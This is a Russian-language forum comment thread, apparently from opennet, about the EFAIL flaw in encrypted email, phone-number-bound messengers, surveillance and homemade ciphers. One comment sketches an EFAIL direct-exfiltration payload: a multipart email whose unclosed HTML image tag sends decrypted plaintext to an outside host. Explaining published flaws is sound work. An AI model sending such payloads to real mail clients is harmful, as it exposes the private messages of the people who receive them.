Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53

90. Сообщение от Ordu (ok), 14-Май-18, 18:20	+/–
Да. Я могу создать сколько угодно почтовых ящиков. И очень часто создаю под новые регистрации новые почтовые ящики. С номерами телефонов всё гораздо сложнее. Я пытался как-то найти сервис, который позволял бы зарегистрировать одноразовый номер для получения одной смс, и чёт у меня не вышло это.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64 Ответы: #133

91. Сообщение от Ivan_83 (ok), 14-Май-18, 18:23	+/–
Как маленький. А госы ихние по твоему что маки и венду не покупают? Это самое очевидное. Из не очевидного всякие инвестиционные фонды, но тут я и не писал ничего, хотя и предполагаю что они тоже льют баблом, у них там из бывших силовиков дохрена народу где в верхах.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #75

92. Сообщение от Ordu (ok), 14-Май-18, 18:36	+1 +/–
> пользователь *не* *понимет*, и «аргументирует» примерно так: «да что ты мне тут рассказываешь! сами XYZ говорят, что у них всё безопасно! а у них милионные обороты, они точно в этом понимают больше, чем ты!» Естественно. Я бы тоже так сказал. > криптографов такие люди читать не станут (иначе они бы *уже* прочитали), и понимать аргументы не могут в силу необразованости. А вот тут ты не прав. Я делал так, и продолжаю делать. Берёшь ссылку и выдаёшь её пользователю. Прилагаешь к ссылке краткое описание, но на уровне хомячка, чтобы он понял. Хомячок либо сглатывает и соглашается, либо краснеет от смущения и убегает, либо решает продолжить спор, но, поскольку возразить криптографу по сути он не может, то его возражения превращаются в упражнения в демагогии. А демагогию хомячка довольно просто размазать по стенке. Хомячки ведь не умеют не только в технологии, но и в аргументацию тоже. Они начинают оскорблять, кричать "а у них негров линчуют", нести ещё какой-то бред -- тут надо просто игнорировать оскорбления и прочие эмоции, и разбирать его аргументы, показывая ему, что она не стоит ни выеденного гроша, ни сломанного яйца. Правда я не вижу зачем это можно делать, кроме как поглумиться над хомячком. Они, когда их к стенке припрёшь, начинают вертеться ужом на сковородке, скатываться всё глубже и глубже в оскорбления. С хомячком случается такое психологическое явление как регрессия: когда всякие "взрослые" методы работы с проблемой не работают, человек начинает использовать методы более ранних возрастов. А потом ещё более ранних. Моё наивысшее достижение -- я человека довёл до пятилетнего возраста, он начал твердить мне что-то типа "ты дурак", и что бы я ему не писал, он отвечал мне "ты дурак". Было прикольно, жалко что за такие достижения не дают памятных грамот и медалей. Я бы на стенку повесил.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86 Ответы: #109, #114, #116

93. Сообщение от Аноним (-), 14-Май-18, 19:31	+/–
тоже самое что и у протона, вроде - опенпгп на жс. Учитывая что закрытые ключи этих сервисов юзверю не доступны - я бы не считал их чем то сесурным
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41

94. Сообщение от Ivan_83 (ok), 14-Май-18, 19:31	+1 +/–
Нет промежуточной позиции. Поскольку оно привязано к мобиле - того кого надо быстро триангулируют, если он вообще на себя не зарегал. А заодно и звонки и смс подымут. А по имеи ещё и узнают какие ещё симки/номера бывали в этой мобиле. TLS был придумал чтобы пользоваться банковскими услугами онлайн, это априори подразумевает некоторую степень доверия всей этой системе и деанонимизацию.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79 Ответы: #96

95. Сообщение от Аноним (-), 14-Май-18, 19:32	+/–
>только писем, переданных в формате HTML пересылать конфиденциальную инфу в хтмл - ссзб
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #97

96. Сообщение от Crazy Alex (ok), 14-Май-18, 19:57	–1 +/–
Ну вот тебе и промежуточная позиция - для триангуляции и подобного надо заинтересовать власти, причём откуда-то ещё, чтобы они пошевелились и предприняли какие-то действия. Но никак не читать/анализировать переписку всех со всеми, как с тем же скайпом или вконтактом. Насчёт TLS - именно, и мвои функции ин неплохо выполняет, заоднлюо рубя всяких горе-хакеров и на прочих сайтах
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #94 Ответы: #122

97. Сообщение от Аноним84701 (ok), 14-Май-18, 20:23	+/–
>>только писем, переданных в формате HTML > пересылать конфиденциальную инфу в хтмл - ссзб Не пересылать в HTML не поможет. Поможет не расшифровывать или же не рендерить (альтернативно: не допускать при этом никаких внешних запросов). См. вполне доходчивый пример: https://efail.de/ (Direct Exfiltration) Кстати, как и ожидалось - Claws и Мutt  (ну и еще несколько менее удобных, второстепенных клиентов) уязвимости не подвержены :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #95 Ответы: #98

98. Сообщение от arisu (ok), 14-Май-18, 20:29	+/–
поможет чудесный маленький фильтр, который html-мусор выкидывает. вместе со всем письмом.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #97 Ответы: #100

99. Сообщение от Аноним (-), 14-Май-18, 20:37	+/–
> проблема касается только писем, переданных в формате HTML, А, ну это еще не так страшно.
Ответить | Правка | Наверх | Cообщить модератору

100. Сообщение от Аноним (-), 14-Май-18, 20:41	+1 +/–
> поможет чудесный маленький фильтр, который html-мусор выкидывает. вместе со всем письмом. Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки и скидывать его в ремотный канал? Так, глядя на это безобразие. //в общем хорошо что я предпочитаю plain text и когтемыл...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #98 Ответы: #101, #107

101. Сообщение от arisu (ok), 14-Май-18, 20:55	+/–
> Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки > и скидывать его в ремотный канал? Так, глядя на это безобразие. зависит от криворукости авторов клиентов. в принципе, все нормальные клиенты должны запрещать такие шутки… но с другой стороны: нормальные люди не пишут клиентов с поддержкой html в письмах.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #100

102. Сообщение от Михрютка (ok), 14-Май-18, 21:00	+/–
шутки шутками, а whois 25 числа обещали прикрыть, бо gdpr compliance
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #29

103. Сообщение от Аноним (-), 14-Май-18, 21:03	–1 +/–
>Use authenticated encryption. Кто-то ещё юзает unauthenticated encryption?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #32

104. Сообщение от Аноним (-), 14-Май-18, 21:05	+/–
> забыл авторство АНБ указать :) Интересно служил ли Брюс Шнайер в АНБ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #23 Ответы: #108

105. Сообщение от angra (ok), 14-Май-18, 21:08	+2 +/–
И как тебе эти блокноты помогут в ситуации, когда уязвимость не в самом механизме методе шифрования или ключе, а в взаимодействии клиентского софта с этим механизмом? Или ты новость не читал?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2

106. Сообщение от Михрютка (ok), 14-Май-18, 21:09	+/–
>> Hacke Nnews вообще-то прекрасно обходится без почты > а ты, конечно, чтобы написать этот комментарий, был просто вынужден ввести свой > почтовый адрес. походу почтовый адрес моей учетки на опеннете не существует, как и домен. это мне не очень мешает.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #78 Ответы: #115

107. Сообщение от Аноним84701 (ok), 14-Май-18, 21:10	+/–
> Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки > и скидывать его в ремотный канал? Так, глядя на это безобразие. А смысл? Принципиально расшифровка и leak делаются вот так: Content-Type: text/html <img src="https://foo.bar/ --BOUNDARY-- Content-Type: application/pksc7-mime: Foo:bar ENCRYPTED MSG // сюда можно подставить любое содержимое, т.е. из тех же текствоых писем --BOUNDARY-- Content-Type: text/html "> --BOUNDARY-- т.е. все достаточно  просто.   А JS все же обычно по умолчанию режется/отключен (вроде бы thunderbird с версии 3, аутлук, гмейл), из-за спама и прочих "радостей".
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #100

108. Сообщение от Аноним (-), 14-Май-18, 21:13	+/–
> Интересно служил ли Брюс Шнайер в АНБ? Вроде бы нет. Но как минимум пару своих же алгоритмов он более не рекомендует, а еще один советует в основном как основу алгоритма хэширования, а не крипто в чистом виде. Но он свои алгоритмы честно оценивает и знает наихучшие атаки, фигли.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #104

109. Сообщение от Аноним (-), 14-Май-18, 21:19	+/–
Ух ты, тут как раз в соседней ветке freehck завалился в такой режим! Из всех аргументов - вопли что я ламер. А это оказывается вот оно что! Ух спасибище за объясение эффекта.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #92

111. Сообщение от Михрютка (ok), 14-Май-18, 21:22	+/–
> Кто бы объяснил: на фига телеграм привязан к телефонному номеру? коллега, если вы приучите простого пользователя, испорченного смартфонами, заносить в телефонную книгу не номер телефона, а vasiapupkin@gde-to-tam, вы испытаете просветление и станете стивджобсом. посчитайте, сколько у вас процентов в телефонной книге контактов, у которых не указан телефон, но указан какой-то другой идентификатор. обдумайте полученный результат. я молчу о том, что signal, например, изначально был сделан для шифрования sms. тут без номера телефона вообще тяжело.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43 Ответы: #126, #134

112. Сообщение от Анонимус2333 (?), 14-Май-18, 21:27	+/–
А где про это можно почитать? Ссылкой поделитесь, пожалуйста.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #87

113. Сообщение от Anonimous (?), 14-Май-18, 21:31	+/–
> анальные карты очень наверное страшны когда на кону тысячи биткоинов полагаю, что в спецслужбах как в мафии: "анальные карты" за серьезный проступок приводят к тому, что даже тело оступившегося будет невозможно найти. Т.е с "анала" кары только начнутся, а не закончатся. Вы сильно переоцениваете значение денег.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #72

114. Сообщение от Anonimous (?), 14-Май-18, 21:42	+/–
Моё наивысшее достижение -- я человека довёл > до пятилетнего возраста, он начал твердить мне что-то типа "ты дурак", > и что бы я ему не писал, он отвечал мне "ты > дурак". Было прикольно, жалко что за такие достижения не дают памятных > грамот и медалей. Я бы на стенку повесил. Сдаётся мне, что тот человек в корень зрил, а до тебя так и не дошло. Перечитай свой пост ещё раз, распечатай и повесь на стенку. Возможно однажды дойдет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #92 Ответы: #117

115. Сообщение от arisu (ok), 14-Май-18, 21:44	+/–
глупый анонимус не в курсе, что на опеннете email при регистрации нужен исключительно для того, чтобы туда присылали комментарии, и вводить можно любую несуществующую фигню. но зато он Мнение Имеет!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #106

116. Сообщение от arisu (ok), 14-Май-18, 21:51	+/–
это потому, что ты и есть дурак. такие дела.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #92 Ответы: #118, #132

117. Сообщение от Ordu (ok), 14-Май-18, 22:19	+/–
>  Моё наивысшее достижение -- я человека довёл >> до пятилетнего возраста, он начал твердить мне что-то типа "ты дурак", >> и что бы я ему не писал, он отвечал мне "ты >> дурак". Было прикольно, жалко что за такие достижения не дают памятных >> грамот и медалей. Я бы на стенку повесил. > Сдаётся мне, что тот человек в корень зрил, а до тебя так > и не дошло. Да какая мне разница, куда он там зрил, если он от увиденного зрелища регрессировал до уровня пятилетнего?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #114

118. Сообщение от Ordu (ok), 14-Май-18, 22:22	+/–
> это потому, что ты и есть дурак. такие дела. И чё? Я и без хомячьих подсказок знаю, собственно, и не скрываю. Ну, не кричу на всех углах об этом, конечно, но и не скрываю.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #116 Ответы: #120

119. Сообщение от КО (?), 14-Май-18, 23:21	+/–
И даже в этом случае в нормальном клиенте не страшно - ибо его html по умолчанию он в инет не выходит.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #69

120. Сообщение от Анонним (?), 15-Май-18, 00:12	+/–
все хомяки, а я мамкин психоаналитик! Регрессия, говорите?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #118 Ответы: #121

121. Сообщение от Ordu (ok), 15-Май-18, 00:44	+/–
> все хомяки, а я мамкин психоаналитик! Регрессия, говорите? Так это не я говорю -- это Фройд говорил. Ты можешь заглянуть в википедию и убедиться в этом. А то что хомяки -- так вы же сами по своей собственной инициативе стали подражать тому хомячку. Тут уж, как говорится, назвался груздем, полезай в кузов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #120 Ответы: #123

122. Сообщение от Anonimous (?), 15-Май-18, 00:50	+/–
"для триангуляции и подобного надо заинтересовать власти" это работает до тех пор пока они (власти) не обладают не обладают технической возможностью постоянно хранить всю бигдату где-то у себя. Как только такая возможность в России появится - нейронные сетки будут день и ночь заинтересованно копать и сопоставлять информацию. После этого можно будет 90% страны прислать различные штрафы по почте, а остальных сразу посадить. Для справки, в штатах подобное хранилище уже есть, https://en.wikipedia.org/wiki/Utah_Data_Center . Другое дело, что в штатах у каждого второго дома арсенал оружия, поэтому власти очень аккуратно себя ведут.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #96

123. Сообщение от Anonimous (?), 15-Май-18, 01:03	+/–
> Так это не я говорю -- это Фройд говорил. Ты можешь заглянуть > в википедию и убедиться в этом. А то что хомяки -- > так вы же сами по своей собственной инициативе стали подражать тому > хомячку. Тут уж, как говорится, назвался груздем, полезай в кузов. это ты ловко с темы спрыгнул! на этом, пожалуй, и закончим.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #121

124. Сообщение от konst55512 (?), 15-Май-18, 01:31	–1 +/–
Есть фантазии. Самый безопасный метод общения между мной и В.Пупкиным такой: используй собственный вариант гав-но-шифровки, типа: tr/abc/cba/. Это реально работающий метод. Не один бот не расшифрует. А вот если всяким там ЦРУ/АНБ/ФСБ захочется мою переписку расшифровать, они не станут задействоать НИИ и проч., а используют безотказный паяльник. Дешевле и быстрее. Именно поэтому не вижу смысла с создании супер-алгоритмов шифрования.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #36 Ответы: #125

125. Сообщение от arisu (ok), 15-Май-18, 01:44	+/–
> типа: tr/abc/cba/. > Это реально работающий метод. Не один бот не расшифрует. лолушки. вот и Профессионалы Криптоанализа пожаловали. эти ваши гуаношифры как раз и ломаются *автоматически*. и нет, волшебные слова «я знаю про фестеля и сделал свой с-бокс!» тоже не спасут. всё ещё автоматически.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #124 Ответы: #127

126. Сообщение от Аноним (-), 15-Май-18, 02:11	+/–
Кому нравится - пусть при регистрации указывает телефонный номер, но зачем же это навязывать?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #111 Ответы: #130

127. Сообщение от konst55512 (?), 15-Май-18, 03:20	+/–
>> типа: tr/abc/cba/. >> Это реально работающий метод. Не один бот не расшифрует. > лолушки. вот и Профессионалы Криптоанализа пожаловали. эти ваши гуаношифры как раз и > ломаются *автоматически*. и нет, волшебные слова «я знаю про фестеля и > сделал свой с-бокс!» тоже не спасут. всё ещё автоматически. Вы категоррически не правы (imho). Я говорил о том, что расшифровать tr/abc/bca/ способен только И ТОЛЬКО тот, кто этого очень хочет. А простые боты используют стандартные способы расшифровки (известные уязвимости). А 2-е мое утверждение, которое не подлежит оспору, - это то, что если кому-то очень-очень захочется узнать, что же я написал Василию Пупкину сумеет сделать это гораздо менее затратно, чем догадавшись сделать tr/bca/abc/.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #125 Ответы: #128, #131

128. Сообщение от arisu (ok), 15-Май-18, 10:27	+1 +/–
я не знаю, что такое «простые боты», и какое они отношение имеют к шифрованию. впрочем, защищаться от воображаемых атакующих — дело приятное и даже иногда прибыльное.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #127

129. Сообщение от unxed (?), 15-Май-18, 13:29	+/–
Какая разница, пока их можно обменять на кем-то признанные фантики.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51

130. Сообщение от Михрютка (ok), 15-Май-18, 23:40	+/–
на киевстар пожалуйся. они на каждой симке телефонный номер навязывают.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #126

131. Сообщение от Аноним (-), 16-Май-18, 00:33	+/–
> Я говорил о том, что расшифровать tr/abc/bca/ способен только И ТОЛЬКО тот, > кто этого очень хочет. А простые боты используют стандартные способы расшифровки Криптография она как осетрина - бывает только первой свежести. Второй сорт - таки уже тухлятина. > (известные уязвимости). В случае известных 0day не поможет даже лучшая криптография. Информационная безопасность штука сложная, комплексная.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #127

132. Сообщение от Аноним (-), 16-Май-18, 03:07	+/–
> это потому, что ты и есть дурак. такие дела. Парадокс в том что это пофиг. Если некто демонстрирует уровень имбецила на публику, его логично считать именно таким имбецилом. А ordu на настолько махрового имбецила все-же не похож, у него аргументы явно посильнее 5-летнего.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #116

133. Сообщение от Аноним (-), 16-Май-18, 03:11	+/–
> Я пытался как-то найти сервис, который позволял бы зарегистрировать одноразовый > номер для получения одной смс, и чёт у меня не вышло это. Это ты плохо искал. Есть такие. Недорого и круто. У некоторых даже есть демо-номера, куда можно совсем уж нахаляву наспамить. Популярные сервисы там конечно выюзаны, но...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #90

134. Сообщение от Аноним (-), 16-Май-18, 03:23	+/–
> тут без номера телефона вообще тяжело. Телефонный номер в смс - весьма абстрактная штука. Если так посмотреть что в нем написано в входящих смс - ну ты понял. Кто угодно может так же. Просто не все об этом задумываются. Представляешь, любой желающий может на самом деле обложить с якобы твоего номера кого угодно трехэтажным матом, например. Несколько менее примитивные варианты провернутые на 1 апреля заставляют корчиться под столом немало гиков - все ограничено только фантазией, большинство хомяков думают как ты и ведутся на раз.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #111

135. Сообщение от Аноним (-), 19-Июл-21, 17:16	+/–
Второе правило крипографии - если ты не Риндейл.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема